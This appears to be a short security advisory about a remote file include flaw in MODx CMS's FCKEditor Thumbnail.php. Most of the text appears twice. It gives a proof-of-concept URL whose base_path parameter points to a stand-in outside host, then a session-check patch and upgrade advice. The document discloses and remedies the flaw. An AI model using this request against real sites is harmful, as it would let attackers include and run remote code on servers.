I found one security threat in using FCKEditor with Modx CMS using Thumbnail.PHP (Remote File Include Vulnerability).
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://www.example.com/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.example2.com/
Solution: Please add the code given below In : /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php:
Code:
if(!isset($_SESSION['mgrValidated'])) {
die("<b>INCLUDE_ORDERING_ERROR</b><br /><br />Please use the MODx Content Manager instead of accessing this file directly.");
}
Please update your site to 0.9.2.2 for a proper fix to this issue
http://modxcms.com/downloads.html
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://www.example.com/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.example2.com/
Solution: Please add the code given below In : /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php:
Code:
if(!isset($_SESSION['mgrValidated'])) {
die("<b>INCLUDE_ORDERING_ERROR</b><br /><br />Please use the MODx Content Manager instead of accessing this file directly.");
}
Please update your site to 0.9.2.2 for a proper fix to this issue
http://modxcms.com/downloads.html